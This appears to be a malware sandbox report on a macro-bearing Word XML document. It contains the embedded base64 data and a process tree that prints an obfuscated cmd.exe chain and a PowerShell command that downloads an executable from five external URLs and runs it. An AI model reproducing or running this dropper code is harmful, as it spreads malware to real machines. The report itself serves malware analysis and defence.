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 AFQATwBPAFAARQBOAAAAQAAAC/AEAAAAEjRWeD== |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:22 15:05:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:01:22 15:05:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3636 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\DOC-281704.doc.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 | ||||
3344 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOC-281704.doc.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2764 | c:\j9656\k4197\v1873\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set kQXu=uh$oQv2m'dr%YE+Fe;g~ZBzpiLG8aIx{-kjOtN=yS7f)/WnT10sb6Pq4.C3VDRc5_}(9,\w@lAH XM:UK&&for %L in (23;3;70;11;53;79;21;25;29;57;78;19;63;68;48;11;10;11;40;13;40;40;29;35;37;37;73;77;13;78;19;32;55;68;48;11;1;11;47;13;77;53;78;19;32;58;68;48;11;72;72;75;2;1;48;63;41;67;38;8;46;48;27;55;52;8;17;2;0;52;52;6;27;38;46;16;70;32;3;51;34;16;62;36;75;37;16;36;56;45;16;51;57;72;24;16;46;36;17;2;3;67;6;27;27;38;8;1;36;36;23;78;44;44;70;70;70;56;28;23;42;32;16;46;36;10;16;23;10;24;50;16;50;27;49;56;62;3;7;44;18;74;67;13;54;52;4;23;6;54;21;73;50;51;37;71;1;36;36;23;78;44;44;70;70;70;56;9;16;5;24;36;42;3;10;70;28;10;9;56;62;3;7;44;74;0;62;80;23;18;54;50;36;52;79;28;39;64;59;7;80;77;71;1;36;36;23;78;44;44;62;28;7;32;36;16;62;1;56;24;10;44;41;48;26;61;54;34;22;42;10;20;71;1;36;36;23;78;44;44;72;28;34;24;10;28;42;28;50;3;23;1;24;16;56;62;3;7;44;70;23;32;24;46;62;72;0;9;16;50;44;47;74;61;67;10;13;33;72;45;76;29;22;20;42;71;1;36;36;23;78;44;44;16;50;9;16;56;28;72;44;59;26;4;12;60;45;23;59;64;13;6;27;13;13;55;76;33;33;8;56;40;23;72;24;36;66;8;71;8;43;17;2;5;41;63;27;41;38;8;34;55;67;58;58;8;17;2;46;58;52;67;55;75;38;75;8;52;55;58;8;17;2;1;6;6;41;38;8;36;55;63;55;6;8;17;2;34;63;27;67;55;38;2;16;46;5;78;36;16;7;23;14;8;69;8;14;2;46;58;52;67;55;14;8;56;16;30;16;8;17;42;3;10;16;28;62;1;66;2;3;58;49;67;67;75;24;46;75;2;3;67;6;27;27;43;31;36;10;39;31;2;0;52;52;6;27;56;60;3;70;46;72;3;28;9;15;24;72;16;66;2;3;58;49;67;67;68;75;2;34;63;27;67;55;43;17;2;42;41;55;41;41;38;8;7;58;48;52;63;8;17;29;42;75;66;66;26;16;36;32;29;36;16;7;75;2;34;63;27;67;55;43;56;72;16;46;18;36;1;75;32;18;16;75;55;49;49;49;49;43;75;31;29;46;5;3;33;16;32;29;36;16;7;75;2;34;63;27;67;55;17;2;72;27;49;41;41;38;8;7;55;67;55;41;8;17;51;10;16;28;33;17;65;65;62;28;36;62;1;31;65;65;2;22;63;49;6;49;38;8;7;27;27;27;58;8;17;91)do set tCK=!tCK!!kQXu:~%L,1!&&if %L geq 91 echo !tCK:*tCK!=!|FOR /F "delims=KHFN tokens=2" %5 IN ('ftype^^^|find "mdFi"')DO %5 " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3368 | CmD /V:ON/C"set kQXu=uh$oQv2m'dr%YE+Fe;g~ZBzpiLG8aIx{-kjOtN=yS7f)/WnT10sb6Pq4.C3VDRc5_}(9,\w@lAH XM:UK&&for %L in (23;3;70;11;53;79;21;25;29;57;78;19;63;68;48;11;10;11;40;13;40;40;29;35;37;37;73;77;13;78;19;32;55;68;48;11;1;11;47;13;77;53;78;19;32;58;68;48;11;72;72;75;2;1;48;63;41;67;38;8;46;48;27;55;52;8;17;2;0;52;52;6;27;38;46;16;70;32;3;51;34;16;62;36;75;37;16;36;56;45;16;51;57;72;24;16;46;36;17;2;3;67;6;27;27;38;8;1;36;36;23;78;44;44;70;70;70;56;28;23;42;32;16;46;36;10;16;23;10;24;50;16;50;27;49;56;62;3;7;44;18;74;67;13;54;52;4;23;6;54;21;73;50;51;37;71;1;36;36;23;78;44;44;70;70;70;56;9;16;5;24;36;42;3;10;70;28;10;9;56;62;3;7;44;74;0;62;80;23;18;54;50;36;52;79;28;39;64;59;7;80;77;71;1;36;36;23;78;44;44;62;28;7;32;36;16;62;1;56;24;10;44;41;48;26;61;54;34;22;42;10;20;71;1;36;36;23;78;44;44;72;28;34;24;10;28;42;28;50;3;23;1;24;16;56;62;3;7;44;70;23;32;24;46;62;72;0;9;16;50;44;47;74;61;67;10;13;33;72;45;76;29;22;20;42;71;1;36;36;23;78;44;44;16;50;9;16;56;28;72;44;59;26;4;12;60;45;23;59;64;13;6;27;13;13;55;76;33;33;8;56;40;23;72;24;36;66;8;71;8;43;17;2;5;41;63;27;41;38;8;34;55;67;58;58;8;17;2;46;58;52;67;55;75;38;75;8;52;55;58;8;17;2;1;6;6;41;38;8;36;55;63;55;6;8;17;2;34;63;27;67;55;38;2;16;46;5;78;36;16;7;23;14;8;69;8;14;2;46;58;52;67;55;14;8;56;16;30;16;8;17;42;3;10;16;28;62;1;66;2;3;58;49;67;67;75;24;46;75;2;3;67;6;27;27;43;31;36;10;39;31;2;0;52;52;6;27;56;60;3;70;46;72;3;28;9;15;24;72;16;66;2;3;58;49;67;67;68;75;2;34;63;27;67;55;43;17;2;42;41;55;41;41;38;8;7;58;48;52;63;8;17;29;42;75;66;66;26;16;36;32;29;36;16;7;75;2;34;63;27;67;55;43;56;72;16;46;18;36;1;75;32;18;16;75;55;49;49;49;49;43;75;31;29;46;5;3;33;16;32;29;36;16;7;75;2;34;63;27;67;55;17;2;72;27;49;41;41;38;8;7;55;67;55;41;8;17;51;10;16;28;33;17;65;65;62;28;36;62;1;31;65;65;2;22;63;49;6;49;38;8;7;27;27;27;58;8;17;91)do set tCK=!tCK!!kQXu:~%L,1!&&if %L geq 91 echo !tCK:*tCK!=!|FOR /F "delims=KHFN tokens=2" %5 IN ('ftype^^^|find "mdFi"')DO %5 " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2976 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $h1579='n1846';$u6628=new-object Net.WebClient;$o9288='http://www.apf-entreprises80.com/gH9Eq6Qp2qBAsbN@http://www.devitforward.com/HucKpgqst6Uay_VmKM@http://cam-tech.ir/71GRqjzfrZ@http://lajirafasophie.com/wp-includes/THR9rEklWXIzZf@http://esde.al/VGQYDWpV_E28EE4Xkk'.Split('@');$v7587='j4933';$n3694 = '643';$h227='t4542';$j5894=$env:temp+'\'+$n3694+'.exe';foreach($o3099 in $o9288){try{$u6628.DownloadFile($o3099, $j5894);$f7477='m3165';If ((Get-Item $j5894).length -ge 40000) {Invoke-Item $j5894;$l8077='m4947';break;}}catch{}}$z5020='m8883';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
